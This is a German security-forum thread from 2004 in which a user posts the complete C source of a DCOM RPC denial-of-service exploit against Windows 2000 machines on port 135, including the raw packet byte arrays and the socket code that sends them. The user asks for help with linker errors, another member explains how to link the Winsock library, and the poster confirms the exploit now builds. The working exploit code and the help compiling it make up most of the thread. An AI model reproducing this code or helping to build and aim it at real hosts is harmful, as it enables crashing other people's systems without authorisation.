Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
Virenschutz · Tools & Aggressive Software Tips zum Kampf gegen gegen Viren, Trojaner, CryptoSoft und Programme, die erstellt wurden um Schaden anzurichten, werden hier behandelt. Aber auch Tools aus dem Security Bereich sind hier richtig.

Exploits

Diskussion: Exploits im Forum Virenschutz · Tools & Aggressive Software, in der Kategorie Security Area; Anzeige Hi leute ich hab mal wieder Probleme Exploits zu kompilieren. Der Debugger zeigt folgende Fehler an: Linker-Vorgang läuft... RPC ...

Antwort
Alt 16.04.04, 12:42   #1 (permalink)
 
Registriert seit: 27.03.04
Frosty Leistung: Facit NTK
Frosty eine Nachricht über ICQ schicken
Likes: 0
Standard Exploits

Anzeige

Hi leute ich hab mal wieder Probleme Exploits zu kompilieren. Der Debugger zeigt folgende Fehler an:
Linker-Vorgang läuft...
RPC Windows2k.obj : error LNK2001: Nichtaufgeloestes externes Symbol __imp__recv@16
RPC Windows2k.obj : error LNK2001: Nichtaufgeloestes externes Symbol __imp__send@16
RPC Windows2k.obj : error LNK2001: Nichtaufgeloestes externes Symbol __imp__WSAConnect@28
RPC Windows2k.obj : error LNK2001: Nichtaufgeloestes externes Symbol __imp__socket@12
RPC Windows2k.obj : error LNK2001: Nichtaufgeloestes externes Symbol __imp__inet_addr@4
RPC Windows2k.obj : error LNK2001: Nichtaufgeloestes externes Symbol __imp__htons@4
RPC Windows2k.obj : error LNK2001: Nichtaufgeloestes externes Symbol __imp__WSAGetLastError@0
RPC Windows2k.obj : error LNK2001: Nichtaufgeloestes externes Symbol __imp__WSAStartup@8
Debug/RPC Windows2k.exe : fatal error LNK1120: 8 unaufgeloeste externe Verweise
Fehler beim Ausführen von link.exe.

Damit kann ich nicht viel anfangen. Was mich auch interessiert: wie finden Programmierer die Schwachstellen? Was muss ich dafür können und wo gibt es vielleicht tutorials? Ich hoffe mal einer kann mir helfen. Das Exploit wobei die Fehler kommen ist ein DoS RPC Exploit gegen Win2000 PCs soweit ich weis:

// This is a new unpatched vulnerability - NOT the MS03-026

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00, 0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00, 0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00, 0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C, 0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00, 0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00, 0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31, 0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31, 0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};



void main(int argc,char ** argv)
{
WSADATA WSAData;
int i;
SOCKET sock;
SOCKADDR_IN addr_in;

short port=135;
unsigned char buf1[0x1000];
printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");
printf("Code by FlashSky,Flashsky xfocus org,benjurry,benjurry xfocus org\n");
printf("Welcome to http://www.xfocus.net\n");
if(argc<2)
{
printf("useage:%s target\n",argv[0]);
exit(1);
}


if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return;
}

addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(port);
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==I NVALID_SOCKET)
{
printf("Socket failed.Error:%d\n",WSAGetLastError());
return;
}
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==S OCKET_ERROR)
{
printf("Connect failed.Error:%d",WSAGetLastError());
return;
}
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERRO R)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}

i=recv(sock,buf1,1024,MSG_PEEK);
if (send(sock,request,sizeof(request),0)==SOCKET_ERRO R)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
}

Frosty ist offline   Mit Zitat antworten
Alt 16.04.04, 14:32   #2 (permalink)
Member of Honour
 
Benutzerbild von ivegotmail
 
Registriert seit: 28.05.03
ivegotmail Leistung: Z3
Likes: 1
Standard

du musst die library ws2_32.lib mit einbinden
__________________
http://livehabo.hackerboard.de | http://livebb.sourceforge.net
ivegotmail ist offline   Mit Zitat antworten
   
HaBOT
 
- Anzeige -

Werbung ist gerade online    
Alt 16.04.04, 15:13   #3 (permalink)
Themenstarter
 
Registriert seit: 27.03.04
Frosty Leistung: Facit NTK
Frosty eine Nachricht über ICQ schicken
Likes: 0
Standard

k und wie mach ich das? ich arbeite mit visual C++
Frosty ist offline   Mit Zitat antworten
Alt 16.04.04, 15:26   #4 (permalink)
Member of Honour
 
Benutzerbild von ivegotmail
 
Registriert seit: 28.05.03
ivegotmail Leistung: Z3
Likes: 1
Standard

mit dieser zeile kannst du die library einbinden
Code:
#pragma comment(lib,"ws2_32.lib")
alternativ kannst du in visual c++ unter
projekt -> einstellungen... -> [registerkarte] linker -> [textfeld] objekt-/bibliothek-module
dort die libray hinzufügen, also einfach hinten mit reinschreiben
__________________
http://livehabo.hackerboard.de | http://livebb.sourceforge.net
ivegotmail ist offline   Mit Zitat antworten
Alt 16.04.04, 15:38   #5 (permalink)
Themenstarter
 
Registriert seit: 27.03.04
Frosty Leistung: Facit NTK
Frosty eine Nachricht über ICQ schicken
Likes: 0
Standard

Danke ihr habt mir wieder gut geholfen jetzt gehts
Frosty ist offline   Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Security Area » Virenschutz · Tools & Aggressive Software » Exploits
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
lokal Exploits? _fux_ Windows 9 29.05.08 10:37
Auktionsplattform für Exploits Elderan News & Ankündigungen 13 05.07.07 21:56
Rootkits und exploits Iverson (In)security allgemein 3 10.02.06 20:44
exploits T.O.C Downloads 3 20.08.05 18:44
Exploits finden? snoopy69 (In)security allgemein 11 12.06.05 12:19


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61